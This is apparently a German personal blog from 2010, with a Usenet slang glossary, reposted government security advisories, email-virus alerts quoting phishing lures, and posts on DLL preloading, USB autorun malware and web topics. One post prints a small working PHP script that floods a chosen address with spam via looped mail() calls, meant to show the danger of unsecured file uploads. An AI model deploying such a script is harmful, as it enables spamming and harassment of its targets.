RO(T)FL – Rolling On The Floor Laughing („wälze mich vor Lachen auf dem Boden“).  ROFLASTC – ...And Scaring The Cat. Beliebig weiterführbar.
ROTFLBTCDICAJTTWADBSISWTRHITSBKABAYB: „Rolling On The Floor Laughing, Biting The Carpet, Dancing In Circles And Jumping Through The Window Almost Dying By Smashing Into Someone Who Then Runs Horrified Into The Street Being Killed Accidentally By A Yellow Bulldozer“
lurken, Lurker - „still“ mitlesen
man [...] -  „man ...“  „Informiere dich bitte über [...], dann kannst du deine Frage selbst beantworten.“
Multiposting - → Crossposting
MUSEN - Meinem unmaßgeblichen Sprachempfinden nach.
Netcop -  Rentnern mit Fernglas hinter der Gardine
Netiquette - elementare Benimmregeln für’s Usenet
Newbie - im Usenet noch neu
Newsreader - Programm für das Usenet
NUA - News User Agent – anderes Wort für Newsreader.
Nuhr - „Wenn man keine Ahnung hat: Einfach mal Fresse halten!“
OjE - User des Microsoft- Newsreader Outlook Express.
OP - Originalposting oder Originalposter
OT - Off topic – nicht zum Thema bzw. Themenbereich der Gruppe gehörend
Pawlow - eine mechanische und oft unangebrachte Reaktion
Plenken - vor Satzzeichen (besonders Frage- und Ausrufzeichen) einen Leerschritt setzen.
*PLONK* - Der Name eines Mitlesers auf dem Boden eines Killfiles aufgeschlagen
PM - Private Mail
Pointer - Stelle, wo eine Information zu finden ist
Popcorn - Diskussion zu einem Thema, das schon x Mal durchdiskutiert wurde
posten - Abschicken eines Usenet- Artikels
Pratchett - „Mehrfache Ausrufzeichen sind ein sicheres Zeichen eines kranken Geistes“
Quote, Zitat
ROT13 - alphabetische Rotation um 13 Stellen
RTFM - Read that f***ing manual! – „Lies das verd***te Handbuch!“
s/abc/xyz/ - Kurzform für: „Ersetze abc durch xyz“.
SCNR - Sorry, could not resist – „Entschuldigung, das konnte ich mir nicht verkneifen“
score adjusted - „ Scorefile angepasst“
Scorefile - „Intelligentes“ Bewertungssystem für Newsartikel
Shift-Taste, defekte - Eigenwillige Auslegung der Regeln zur Groß- und Kleinschreibung
Signatur, Sig - Fußzeile eines Postings
sinnfrei - „sinnlos“ oder „unsinnig“.
Spellflame - Missbrauch von Rechtschreibschwächen des Diskussionsgegners als Argument
Subject - Betreffzeile eines Artikels
Supersedes - Ein Artikel, der einen anderen ersetzt
Tante Gu - Weiß alles!
Thread - Gesamtheit eines Originalpostings und sämtlicher Follow-Ups
TIA - Thanks In Advance – „Danke im Voraus“
Tischkante -  beißt vor Lachen in die Tischkante
TLA - Three Letter Acronym – „Drei-Buchstaben-Abkürzung“.
[tm] - Kürzel für „trademark“
TOFU - logische Folge von Frage und Antwort wird auf den Kopf gestellt.
Troll, Elch - bewusst herumpöbelnder Artikel
Usenetverwaltung - jeder passt auf sich selbst auf.
-v - „Das verstehe ich so nicht – könntest du es mal etwas ausführlicher darlegen?“
WFM - Works For Me – „Bei mir geht’s“
Wowereit - „Und das ist auch gut so“.
WWG - „Wieder was gelernt“
xf'up2 - Abkürzung für „ X-Post & F'up2 “
Xpost - Abkürzung für Crosspost.
YMMD - You Made My Day – „Du hast mir den Tag gerettet“
YMMV - Your Mileage May Vary  „Unter anderen Umständen kann man natürlich auch zu ganz anderen Ergebnissen/Ansichten kommen“.
42 - „Zweiundvierzig“, niemand weiß mehr, wie die Frage eigentlich genau lautet.
!= - „... ist etwas anderes als ...“

Mittwoch, 22. September 2010

Cuil SEO ist DOWN

Cuil ist ähem war eine recht intensive Suchmaschine und die ist inzwischen DOWN oder genauer weg vom Fenster
Wir fanden diese Suchmaschine  zwar recht gut vor allen Dingen als Webmaster wegen den diversen Möglichkeiten / Features für die eigene Homepage, aber das genügte wohl nicht um im Kampf der Giganten zu bestehen. Schade drum! Ansonsten hätten wir es noch vor ein paar Jahren nicht für möglich gehalten, daß eine so große Suchmaschine pleite gehen kann! Aber anscheinend ist heute wirklich nichts mehr unmöglich. An der Qualität der Suchmaschine lag es nach unserem Ermessen nicht, wohl eher an der fehlenden Resonanz Ihrer Besucher!

Ausführliche Meldung (in English)

Samstag, 11. September 2010

Mal ein kleiner Test für die Sicherheit

Ich probier mal was und das ist die Sicherheit im Internet zu erhöhen indem ich Sicherheitswarnungen von anderen hier in meinem Blog mit veröffentliche. Ich nehme an, daß durch die Einbindung des RSS-Feeds vom Blog in anderen Webseiten und die RSS-Feed Abos diese wichtigen Sicherheitsinformationen besser verbreitet werden und das Netz dadurch sicherer wird.

Meine Absicht ist es:
Die technischen Warnungen unseres Bundesministerium für Datensicherheit in der Informationstechnologie (BSI) und die eMail - Virenmeldungen des Viren - Tickers in Monaten zusammengefasst zu posten.
...
Noch ne wichtige Anmerkung:
Sämtliche Sicherheitsmeldungen bedeuten nicht, daß die Konkurrenzprodukte deshalb sicherer sind. Tatsächlich bedeuten diese Meldungen nur, daß hier etwas für die Sicherheit getan und nicht darüber geschwiegen wurde, bis die ganze Cyberwelt es heraus schreit!

Es folgen die technischen Warnungen unseres Bundesministerium für Datensicherheit in der Informationstechnologie (BSI)


Zusammenfassung der Technischen Warnungen im Monat September
Die Details der Meldungen sind fuer Sie online abrufbar unter
http://www.buerger-cert.de
-----------------------------------------------------------------------
Sicherheitsupdate fuer Adobe Flash Player [Bcert-2010-0093/1]
Risiko: Hoch
Komplette Meldung:
http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0093
-----------------------------------------------------------------------
Microsoft Patchday September 2010 [Bcert-2010-0094/1]
Risiko: Mittel
Komplette Meldung:
http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0094
-----------------------------------------------------------------------
Apple Mac OS X Sicherheitsupdate 2010-006 [Bcert-2010-0095/1]
Risiko: Mittel
Komplette Meldung:
http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0095
-----------------------------------------------------------------------
-----------------------------------------------------------------------
Apple QuickTime Player 7.6.8 [Bcert-2010-0092/1]
Risiko: Hoch
Komplette Meldung:
http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0092
-----------------------------------------------------------------------
-----------------------------------------------------------------------
Mozilla Foundation aktualisiert Firefox, Thunderbird und Seamonkey
[Bcert-2010-0088/1]
Risiko: Hoch
Komplette Meldung:
http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0088
-----------------------------------------------------------------------
Apple Safari Safari 5.0.2 and Safari 4.1.2 [Bcert-2010-0089/1]
Risiko: Hoch
Komplette Meldung:
http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0089
-----------------------------------------------------------------------
Apple iPhone und iPod Touch [Bcert-2010-0090/1]
Risiko: Mittel
Komplette Meldung:
http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0090
-----------------------------------------------------------------------
Adobe Reader und Acrobat 9.3.4 [Bcert-2010-0091/1]
Risiko: Hoch
Komplette Meldung:
http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0091
-----------------------------------------------------------------------
Mal sehen ob was nützliches dabei herauskommt?


Technische Warnungen des Buerger-CERT
[Bcert-2010-0093/1]:
Sicherheitsupdate fuer Adobe Flash Player

Risiko: Hoch

Betroffene Systeme:
Adobe Flash Player Version 10.1.82.76 und frueher fuer Windows, Macintosh, Linux und Solaris
Adobe Flash Player Version 10.1.92.10 und frueher fuer Android
Adobe Flash Player vor Version 9.0.283

Empfehlung:
Das Buerger-CERT empfiehlt die zeitnahe Aktualisierung des Adobe Flash Players (10.1.85.3 fuer Windows, Macintosh. Linux und Solaris bzw. 10.1.95.1 fuer Android) fuer den jeweils genutzten Browser. Bei dem Adobe Flash Player geschieht dies am einfachsten ueber die integrierte Update-Funktion oder ueber die Webseite
http://get.adobe.com/flashplayer/
Anwender des Flash Players fuer Android Version 10.1.92.10 und frueher koennen die Aktualisierung ueber den Android Marketplace durchfuehren.
Adobe bietet eine Webseite [2] zur Pruefung der aktuell installierten Flash Player Version an. Bei dem Einsatz mehrerer Browser sollte die Pruefung fuer jeden einzelnen Browser durchgefuehrt werden.
Fuer Anwender, die nicht auf Flash Player 10.1.85.3 aktualisieren koennen, stellt Adobe eine aktualisierte Flash Player Version 9.0.283 bereit [3].

Beschreibung:
Adobe behebt mit dem Sicherheitsupdate fuer den Flash Player eine kritische Schwachstelle, die es einem Angreifer ermoeglicht, beliebigen Code auf betroffenen Systemen auszufuehren. Hierfuer reicht bereits der Besuch einer vom Angreifer praeparierten Webseite.
[Bcert-2010-0088/1]:
Mozilla Foundation aktualisiert Firefox, Thunderbird und Seamonkey

Risiko: Hoch

Betroffene Systeme:
Mozilla Firefox vor Version 3.6.9
Mozilla Firefox vor Version 3.5.12
Mozilla Thunderbird vor Version 3.1.3
Mozilla Thunderbird vor Version 3.0.7
SeaMonkey vor Version 2.0.7

Empfehlung:
Das Buerger-CERT empfiehlt Nutzern des Webbrowsers Firefox und des E-Mail-Clients Thunderbird die von ihnen genutzte Versionsreihe zu aktualisieren. Der Support der Firefox-Versionsreihe 3.5 ist ausgelaufen.
Am einfachsten ist ein Update ueber die integrierte Update-Funktion moeglich:
Menue "Hilfe", "Nach Updates suchen..." bzw. "Firefox/Thunderbird aktualisieren".
Alternativ stehen die Installationspakete auf folgenden Webseiten zum Herunterladen bereit:
Firefox 3.6.9
http://www.mozilla.com/de/
Firefox 3.5.12
http://www.mozilla.com/en-US/firefox/all-older.html
Thunderbird 3.1.3
http://www.mozillamessaging.com/de/
Thunderbird 3.0.7
http://www.mozillamessaging.com/en-US/thunderbird/all-older.html
SeaMonkey 2.0.7
http://www.seamonkey-project.org/releases/

Beschreibung:
Ein Angreifer kann die von den Mozilla-Entwicklern in Firefox und Thunderbird geschlossenen Schwachstellen ausnutzen, um Informationen auszuspaehen, einen Absturz der Anwendung auszuloesen oder beliebigen Code zur Ausfuehrung zu bringen.
[Bcert-2010-0089/1]:
Apple Safari Safari 5.0.2 and Safari 4.1.2

Risiko: Hoch

Betroffene Systeme:
Apple Safari vor Version 5.0.2
Apple Safari vor Version 4.1.2

Empfehlung:
Das Buerger-CERT empfiehlt das von Apple bereitgestellte Safari-Sicherheitsupdate so rasch wie moeglich zu installieren. Dies geschieht unter Mac OS X am einfachsten ueber die integrierte Funktion "Software Aktualisierung" des Betriebssystems bzw. unter Microsoft Windows mit der Anwendung "Apple Software Update".
Alternativ kann das Safari-Update auch manuell von der Apple
Download-Webseite heruntergeladen werden:
http://support.apple.com/downloads/

Beschreibung:
Mit den Safari Versionen 5.0.2 und 4.1.2 schliesst Apple drei Sicherheitsluecken im Browser. Die Ausnutzung der Sicherheitsluecken ermoeglicht einem entfernten Angreifer mithilfe von praeparierten Webseiten u.a. die Ausfuehrung von Schadcode auf dem System des Opfers.
[Bcert-2010-0091/1]:
Adobe Reader und Acrobat 9.3.4

Risiko: Hoch

Betroffene Systeme:
Adobe Reader und Acrobat Version 9.3.4 und frueher

Empfehlung:
Ein Patch des Herstellers steht derzeit nicht zur Verfuegung. Derzeit verwenden die praeparierten PDF-Dokumente zur Ausnutzung dieser Sicherheitsluecke JavaScript. Daher eine Deaktivierung von JavaScript grundsaetzlich sinnvoll.
Dies ist in Adobe Reader und Acrobat ueber das Menue
"Bearbeiten" > "Voreinstellungen..." > Kategorie "JavaScript"
moeglich. Entfernen Sie zur Deaktivierung von JavaScript in PDF-Dokumenten den Haken vor der Option "Acrobat JavaScript aktivieren" und bestaetigen Sie das Fenster mit der Schaltflaeche "OK".
Diese Massnahme bietet allerdings keinen vollstaendigen Schutz vor Ausnutzung der Schwachstelle.

Beschreibung:
Adobe warnt vor einer neuen Sicherheitsluecke im Adobe Reader und Acrobat 9.3.4 sowie frueheren Versionen fuer Windows, Mac und Unix. Die Sicherheitsluecke wird bereits aktiv ausgenutzt, um ueber manipulierte PDF-Dokumente Windows-PCs zu kompromittieren.


Durch eMails verbreitete Viren


Zusammenfassung der Virenmeldungen im Monat September
Die Details der Meldungen sind fuer Sie online abrufbar unter
http://www.viren-ticker.de/

Angeblicher Abbuchungsauftrag versucht einen Trojaner einzuschleusen
Es werden E-Mails versandt, die angeblich einen Abbuchungsauftrag bestätigen. Der E-Mail-Text weist den Empfänger auf einen Rechnungsbetrag von 5.672 Euro hin – nähere Details könne der Empfänger dem beigefügten Anhang entnehmen. In dem Anhang steckt natürlich kein Abbuchungsauftrag, sondern der heimtückische Trojaner iBill.T, der das betreffende System infizieren will.
Die E-Mail hat folgendes Aussehen:
Betreff: Leihvertrag
Dateianhang: Rechnung.rar
Größe des Dateianhangs: 65 KByte
E-Mail-Text: „Sehr geehrter Kunde, sehr geehrte Kundin!
Ihr Abbuchungsauftrag Nr. 140525114897 wurde erfüllt.
Ein Betrag von 5672.00 EURO wurde abgebucht und wird in Ihrem Bankauszug als "Paypalabbuchung " angezeigt.“
Betroffene Betriebssysteme: Alle Windows-Versionen
mehr Infos finden Sie unter http://www.viren-ticker.de/ »»

Wurm tarnt sich als fehlgeleitete E-Mail
Der Wurm Mytob.A wieder unterwegs. Der Wurm versteckt sich im Anhang einer E-Mail, die scheinbar nicht zugestellt werden konnte. Nähere Angaben zu dieser E-Mail können Sie angeblich der im Anhang befindlichen Datei entnehmen. Und das ist natürlich gelogen.
Wird die sich im Anhang befindende Datei durch einen Doppelklick geöffnet, erhält man keine Informationen über die entsprechende E-Mail, die nicht zugestellt werden konnte. Stattdessen installiert sich der Wurm auf dem betreffenden System.
Die E-Mail hat folgendes Aussehen:
Betreff: „Mail Delivery System”
Dateianhang: „body.zip.exe“.
Größe des Dateianhangs: 41.824 Bytes.
E-Mail-Text: „Mail transaction failed. Partial message is available.“
Betroffene Betriebssysteme: Alle Windows-Versionen
mehr Infos finden Sie unter http://www.viren-ticker.de/ »»

Gefahr durch falschen Abbuchungsauftrag
Es werden E-Mails versandt, die angeblich einen Abbuchungsauftrag bestätigen. Der E-Mail-Text weist den Empfänger auf einen Rechnungsbetrag hin – nähere Details könne der Empfänger dem beigefügten Anhang entnehmen. In dem Anhang stecken natürlich keine Informationen über den Abbuchungsauftrag, sondern der heimtückische Wurm Klez.E7, der das betreffende System infizieren will.
Die E-Mail hat folgendes Aussehen:
Betreff: Vertrag
Dateianhang: Rechnung.rar
Größe des Dateianhangs: 65 KByte
E-Mail-Text: „Sehr geehrte Kundin, sehr geehrte Kunde,
Ihr Abbuchungsauftrag wurde erfüllt. Sie finden die Details zu der Rechnung im Anhang.“
Betroffene Betriebssysteme: Alle Windows-Versionen
mehr Infos finden Sie unter http://www.viren-ticker.de/ »»

Wurm lockt mit nackter Fußball-Mannschaft
Der Wurm Soccer.C lockt mit Bildern einer angeblich nackten Fußball-Mannschaft. Im Anhang der E-Mail befinden sich dann wie immer keine Bilder, sondern der Wurm lauert darauf, das betreffende System zu kapern.
Die E-Mail hat folgendes Aussehen:
Betreff: „Naked World Cup game set“
Dateianhang: soccer_nudist.bmp.exe
E-Mail-Text: „Nudists are organising their own tribute to the world cup, by staging their own nude soccer game, though it is not clear how the teams will tell each other apart. Good photos ;)“.
Dateigröße: 39.904 Bytes
Betroffene Betriebssysteme: Alle Windows-Versionen
mehr Infos finden Sie unter http://www.viren-ticker.de/ »»

E-Mail aus China lockt mit angeblichen Dokument im Anhang
Der Wurm Traxgy.B5 ist unterwegs und verstopft die E-Mail-Postfächer. Im Anhang befindet sich ein angebliches Dokument. Die E-Mail ist leicht zu erkennen, da Betreff und E-Mail-Text aus chinesischen Schriftzeichen bestehen. Im Anhang befindet sich aber eine Datei mit der Bezeichnung Document.
Nach einem Doppelklick auf die im Anhang befindliche Datei, wird jedoch kein Dokument mit dem verknüpften Textverarbeitungsprogramm geöffnet, stattdessen installiert sich der Wurm auf dem System.
Die E-Mail hat folgendes Aussehen:
Betreff: %chinesischer Text%
Dateianhang: Document
Dateierweiterung: .exe
Größe des Dateianhangs: 57.344 Bytes
E-Mail-Text: %chinesischer Text% Document.exe %chinesischer Text%
mehr Infos finden Sie unter http://www.viren-ticker.de/ »»

Trojaner kommt mit falscher Rechnung von Amazon
Es werden E-Mails versandt, die angeblich von Amazon stammen. Der E-Mail-Text weist den Empfänger auf einen Rechnungsbetrag von 715 Euro für einen bestellten Laptop hin – nähere Details könne der Empfänger dem beigefügten Anhang entnehmen. In dem Anhang steckt natürlich keine Rechnung, sondern ein heimtückischenr Trojaner, der das betreffende System infiziert.
Die E-Mail hat folgendes Aussehen:
Betreff: „Ihre Bestellung 2984234 bei Amazon.de“.
Dateianhang: „Rechnung.doc.zip“
E-Mail-Text: „Vielen Dank für Ihre Bestellung bei Amazon.de!
Das Sony VAIO Notebook wird in Kürze versendet. Die Kosten von 715,- Euro werden Ihrem Konto zu Last gelegt. Die Einzelheiten zu Ihrer Bestellung entnehmen Sie bitte der angefügten Rechnung. Falls Sie die Bestellung stornieren möchte, bitte den in der Rechnung angegebenen Kundenservice anrufen und Ihre Bestellnummer bereithalten. Eine Kopie der Rechnung wird Ihnen in den nächsten Tagen schriftlich zugestellt.
Virus: Dldr.iBill.Z
Virustyp: Trojaner
Dateigröße: 12.800 Bytes
Betroffene Betriebssysteme: Alle Windows-Versionen
mehr Infos finden Sie unter http://www.viren-ticker.de/ »»

Gefälschter Office-Patch versucht Ihr System zu kapern
Der Trojaner Badware12 ist unterwegs und versucht Anwendern ein falsches Microsoft Office-Update vorzugaukeln. Die E-Mail ist angeblich vom Onlinedienst MSN und enthält ein Update für Office 2007. Das ist natürlich gelogen: Wer dem Link in der E-Mail folgt, erhält kein Update, sondern einen gefährlichen Trojaner untergeschoben.
Die E-Mail hat folgendes Aussehen:
Betreff: „Update for Office 2007 only“
E-Mail-Text: unterschiedlicher Text
Betroffene Betriebssysteme: Alle Windows-Versionen
mehr Infos finden Sie unter http://www.viren-ticker.de/ »»

Dienstag, 7. September 2010

Die Zeiten sind Scheiße

Und werden sicherlich noch beschissener!
Wer es trotzdem nicht lassen kann und sich für die bürgerlichen Werte unserer freiheitlichen demokratischen Grundordnung einsetzen will, wenn es sein muß, der / die / das sollte sich von denen, die täglich damit zu tun haben, beraten lassen, denn Hollywood ist verdammt weit weg und die harte Realität unterscheidet sich immens von der schönen heilen Welt, die uns neben den häslichen Nachrichten täglich aus den Medien berieselt.

So kann ich helfen (richtig)

http://www.aktion-tu-was.de/

Zitat:
Zivilcourage lässt sich lernen – zum Beispiel im Unterricht oder in der Jugendarbeit. Speziell hierfür entwickelt wurde ein Medienpaket, das aus einer DVD und einem Filmbegleitheft besteht. Die DVD enthält vier Filme, die das Thema "Zivilcourage" im Zusammenhang mit den Aspekten Alkohol/Gewalt, Drogendeal, Handyraub und Ladendiebstahl behandeln.

Kleiner Surftip am Rande:
https://www.buerger-cert.de/archiv.aspx

Mit Dateiuploads sich den Tag versauen

Wir haben schon auf allen möglichen Websites darauf hingewiesen, Dateiuploadmöglichkeiten genügend abzusichern. folgende kleines Snippet soll zeigen, wie stinkeinfach es ist eine WebSite mit Dateiupload als Spam und Virenschleuder zu verwenden.

$t="Sp0wnd!";
$n="Y0u @r3 Sp0wnd by ~B4CksT0r~";
$a="~B@(ksT0r~";
$e=$_GET['e'];
$az=$_GET['az'];

for($i=0;$i<$az;$i++){
mail($e, $t, $n,"From: $a <$a>");
}
?>

Dabei ist dieser kleine Mehrzeiler nicht gerade ein Ausbruch an Intelligenz, sondern eher Mittelklasse, da er nicht mehr wie fachliche Grundkenntnisse verlangt und trotzdem wird die IP schön versteckt nur für wenige bekannt garantiert nie den wirklichen Spammer verraten. Es ist andererseits mit der FOR Abfrage schon direkt ein Riesenschritt von den profanen und allseits beliebten Übergabe URLs der Spammer für Gästebücher und andere Kommunikationsmöglichkeiten mit WebSites.

Wir empfehlen zur Spamvermeidung durch ÜbergabeURLs das bewährte ReCaptcha System:
http://www.google.com/recaptcha

Die DLL Suchroutine beeinflussen

Der zweite Beitrag im Virenbastelkurs dieses Monats befasst sich mit einer zur Zeit sehr beliebten Masche bei der über eine vorab geladene DLL die User einschließlich der Schutzsysteme überlistet werden.
Microsoft hat anscheinend auf Grund der vielfältigen Konfigurations- und daraus folgenden Fehlermöglichkeiten des Patches auf den beliebeten One Klick Button zu verzichten. Ist wohl wirklich nicht möglich es einigermaßen passend zu gestalten, ohne allzu viele wütende Kunden zur Konkurrenz zu treiben!

Jeder Programmierer weiß das die OS Ihre Daten auf einem vorgeschriebenen Weg suchen. mit Einführung der vielen Applikationen die inzwischen über das Web laufen, kam wohl irgendjemand die Idee, na dann kann ich ja auch DLLs des Zielsystems auf meinem Server aufrufen lassen. Im Zusammenhang mit dem ClickJacking kann dabei natürlich echt die Post abgehen,.dementsprechend bleibt folgerichtig nur eine vorherige starre Beeinflussung des Suchweges übrig.
Deshalb muß zum Schutz als erstes der DLL Suchpfad angepasst.

Ein neuer Registrierungseintrag "CWDIllegalInDllSearch" zum Steuern des DLL-Suchpfadalgorithmus ist verfügbar

Fachchinesisch
Dieses Update führt den neuen Registrierungseintrag CWDIllegalInDllSearch ein, mit dem Benutzer den DLL-Suchpfadalgorithmus steuern können. Der DLL-Suchpfadalgorithmus wird von der LoadLibrary-API und der LoadLibraryEx-API verwendet, wenn DLLs ohne Angabe eines vollqualifizierten Pfads geladen werden.

Genaue Erläuterung bei Microsoft:
http://support.microsoft.com/kb/2264107
am Ende der Seite muß im ersten Schritt als erstes der passende Patch für das OS des Zielrechners heruntergeladen und installiert werden.

Als Zweites muß das FixIT heruntergeladen und installiert werden.
bei Technet
An update on the DLL-preloading remote attack vector

http://blogs.technet.com/b/srd/archive/2010/08/31/an-update-on-the-dll-preloading-remote-attack-vector.aspx

Hinterher muß natürlich noch der/die schlaue Sysadmin das FixIt gut und passend zu konfigurieren, woran die meisten wohl scheitern werden. Was natürlich im Rückschluß ein richtig tolles Potential zur Verfügung stellt!

Bleibt nur zu Wünschen übrig, daß sich ein ausreichend dummer Hund findet, dieses Scheunentor im Sicherheitssystem zu stopfen!

Virenverbreitung per USB macht sich breit

Auch wenn ich mal wieder frage, wo das Hirn bei jungen Menschen abgeblieben ist, so möchte ich doch auf eine recht simple aber sehr effektvolle, weil mal wieder von hinten ausgeführte, Verbreitung von Viren aufmerksam zu machen. USB Anschlüsse sind die am weitesten verbreitete Art IT Geräte miteinander zu verbinden. Dabei wird für die vielen lukrativen Computergenies die Windows interne Autorun.inf  Funktionalität genutzt von den guten und den Bösen. Jede poppelige Autorun.inf ist nur eine primitive Text Datei. Der Unterschied zwischen den Beiden ist die Gute verweist auf ein ordentliches Anwendungsprogramm und die Böse auf einen Virus.

Tja manche Böse sind mit guten Verbindungen ausgestattet, davon kann Panda und Vodafone ein Liedchen trällern, der Text geht ungefähr so:
Eine spanische Panda Mitarbeiterin entdeckte Anfang März schädliche Software auf ihrem neu erstandenen Smartphone HTC Magic von Vodafone. Als sie das Handy über USB an ihren PC anschloss, schlug die installierte Panda Cloud Antivirus Software sofort Alarm. Eine Analyse ergab, dass es sich bei dem Handy tatsächlich um einen Mariposa Bot Client handelte. Zusätzlich entdeckte unser spanischer Malware-Experte Pedro Bustamante weitere Malware wie den Conficker-Wurm und einen Trojaner auf der Speicherkarte des Vodafone-Geräts.

Der Text von Panda geht hier weiter:
http://www.pandasecurity.com/germany/enterprise/media/press-releases/viewnews?noticia=10120

Der Text von Panda & Vodafone geht hier weiter:
http://research.pandasecurity.com/vodafone-distributes-mariposa/

Wer sich diese Art der Virenverbreitung mit Proggys vom Hals halten möchte:
mit Vaccine bei Panda:
http://free.pandasecurity.com/de/

mit Tweak UI bei Microsoft:
http://www.microsoft.com/windowsxp/downloads/powertoys/default.mspx

mit dem Autorun.inf Editor von Karen's Power Tools
http://www.karenware.com/powertools/powertools.asp

Für andere die es mit Grips versuchen:
in English:
http://msdn.microsoft.com/de-de/library/bb776825.aspx

in Deutsch:
http://www.fz-juelich.de/jsc/files/net/security/inf-xp/No-AutoRun/no-autorun-zam.htm

Sonntag, 15. August 2010

Baden von franky4you - Google 3D-Galerie

Aktuell ist Googles Streetview auf jeder gedruckten Regenbogenseite zu finden, während ein paar Seiten gut bezahlte Annoncen des regionalen oder lokalen Fleischmarktes die Spalten füllen oder unseriöse Jobangebote unbegründet Reichtum durch Arbeit versprechen, schwingt sich jeder Tintenklecks bei ein paar ollen Bildchen von der Straße zur edlen Burg des Datenschutzes auf.

Doch es gibt auch noch eine andere Form der Persönlichkeitsgefährdung nämlich die in Google Earth verwendeten 3D Modelle und für alle die sich unser wunderschönes Badnerland in Google Earth mit den 3D Modellen verschönern wollen haben wir diese Sammlung erstellt:

3D Modelle aus dem Badischen Land: Karlsruhe, Freiburg, Offenburg, Mannheim, Basel, Lörrach, Schwarzwald

Baden von franky4you - Google 3D-Galerie

Nichts ist vollkommen und so gibt es auch etliche 3D Modelle die noch in Arbeit sind, deshalb mußten wir die Sammlung auch erweitern.

Microsoft Download Center: Suchergebnisse

Für SysAdmins die Offline verschiedene Windowssysteme mit den nötigen Updates versorgen müssen, gibt es im Microsoft Support Download Center einen kleinen Trick. Über die Suche nach ISO-Abbild lassen sich die monatlich zusammengefassten Downloads als ISO Dateien herunterladen.

Vorteil:
Damit haben Sie alle Möglichkeiten der Windows Produktgruppen abgedeckt.

Nachteil:
Die ISO Dateien variieren und können abhängig von der Datenmenge bis zu 2 DVDs benötigen.

Microsoft Download Center: Suchergebnisse ISO-Abbild

Donnerstag, 5. August 2010

Festnetz und Telefon Nachrichten auf Billiger-Telefonieren.de

Eigentlich nur ein kommerzielles Webangebot, was aber mit vielen und außergewöhnlich gut recherchierten Beiträgen zu Abzockern und anderen unseriösen Angeboten richtig angenehm glänzt.

»»» Festnetz und Telefon Nachrichten auf Billiger-Telefonieren.de

Montag, 26. Juli 2010

Schluß mit der ollen Technik

Es klingt hart, aber Webseiten und Webapplikationen werden heutzutage noch mit Mitteln aus dem letzten Jahrhundert erstellt. Der neue HTML 5  Standard wird nicht nur Semantik und JavaScript-APIs bringen sondern auch  etliche neue Möglichkeiten in Sachen Grafik und Multimedia.

YouTube bietet seine Videos bisher nur in Flash - Playern an. Mit HTML 5 gibt es aber vollkommen neue Möglichkeiten, die aber bisher nicht von allen Browsern unterstützt werden.
http://www.youtube.com/html5

Mit HTML5Rocks hat Google eine Anlaufstelle rund um HTML5 ins Netz gestellt. Dort finden sich Präsentationen und Tutorials rund um HTML5, die zum Teil selbst ausgiebigen Gebrauch von neuen HTML5-Funktionen machen. HTML5 bietet etliche neue  Technologien. Konkrete Beispiele gibt es bei Google mit seiner neuen Website HTML5Rocks. Entwicklern wird gezeigt, was bereits heute mit diversen Browsern zu möglich ist.Eine richtig gut gemachte Übersicht der vielen Features gibt es von Google unter: http://slides.html5rocks.com/

Viele gute Links für das noch junge HTML 5:
http://x-html5.de/

Eine eher langweilige akademische Diskussion bei der aber zur auch noch so richtig gefetzt wird, gibt es bei Wikipedia:
http://de.wikipedia.org/wiki/HTML5

Dienstag, 20. Juli 2010

Wichtiges iTunes Update

Apple hat in der Nacht ein wichtiges Update für iTunes veröffentlicht und damit die Version 9.2.1 zum Download bereitgestellt. Das Paket kann direkt über die Softwareaktualisierung von Apple installiert werden.
iTunes 9.2.1 enthält viele wichtige Fehlerbehebungen, einschließlich:
  • Deaktiviert ältere Versionen einiger inkompatibler Plug-Ins von Drittherstellern
  • Behebt geringfügige Probleme beim Drag&Drop von Objekten
  • Behebt ein Leistungsproblem beim ersten Synchronisieren mancher Geräte mit iTunes 9.2
  • Behebt ein Problem bei der Aktualisierung auf iOS 4 für iPhones oder iPod touches mit verschlüsselten Backups
  • Behebt andere Probleme, die die Stabilität und Leistung beeinträchtigt haben.

Freitag, 16. Juli 2010

Fun Pics, lustige Videos und Online Games kostenlos auf isnichwahr.de

Deutschlands größte Fun - Community
In den Abteilungen | FunPics | lustige Videos | Online Spiele | Flash | Witze & Texte | eBay Auktionen | Webseiten | Diverses | gibt es jede Menge zum Schmunzeln.
Fun Pics, lustige Videos und Online Games kostenlos auf isnichwahr.de

Donnerstag, 15. Juli 2010

AD Nutzer sind zur Zeit der häßliche Mops

Anscheinend konnten Ad-Server die auf dem Open X Prinzip basieren, als die zur Zeit größten Malware Schleudern ausgemacht werden. Durch eine Schwachstelle im OpenX System können über für die ADs vorgesehenen IFrames auf Webseiten Malware auf den Rechner des Besuchs geschleust werden. Das ist deswegen äußerst ärgerlich, da dadurch viele eigentlich seriöse Webseiten zu echten Virenschleudern werden.

Bürger-CERT ist ein Projekt des Bundesamtes für Sicherheit in der Informationstechnik (BSI).
SICHER o INFORMIERT
Extraausgabe vom 15.07.2010
Webauftritte verteilen Schadcode an Internetnutzer
Kompromittierte Werbebanner

Es sollte deshalb jedes Betriebssystem, Anwendung und Antivirenschutz stets auf dem aktuellen Stand gehalten werden. Insbesondere sollten die verfuegbaren Patches für Java, Adobe-Reader und Windows-Betriebssysteme installiert werden.

Die Firefox-Erweiterung NoScript [https://addons.mozilla.org/de/firefox/addon/722/] schuetzt in der Default-Einstellung vor eingebetteten IFRAME-HTML-Elementen, allerdings und auch leider nicht nur davor.

Mittwoch, 14. Juli 2010

eBay und seine Flash-Cookies

Flash-Cookies oder Local Shared Objects (LSO) sind Dateien, in die Webseiten, welche Flash-Medien einbinden, benutzerspezifische Daten auf dem Rechner des sie abrufenden Benutzers schreiben und später wieder auslesen können. Verwaltet werden diese Dateien nicht vom Webbrowser  selbst, sondern von seinem jeweiligen Flash-Player-Plugin.
(mehr bei Wikipedia)

Eingebaut wurden die überaus hartnäckigen Cookies von eBAY um die Sicherheit zu erhöhen. Schon vor der Einführung gab es jede Menge Unkenrufe aus allen Ecken des Webs, doch was uns gestern passierte, war mal wieder vom Feinsten.

Meine Frau und ich haben beide einen Account in eBay, die beide noch zusätzlich mit den Sicherheitsschlüssel abgeschottet werden.
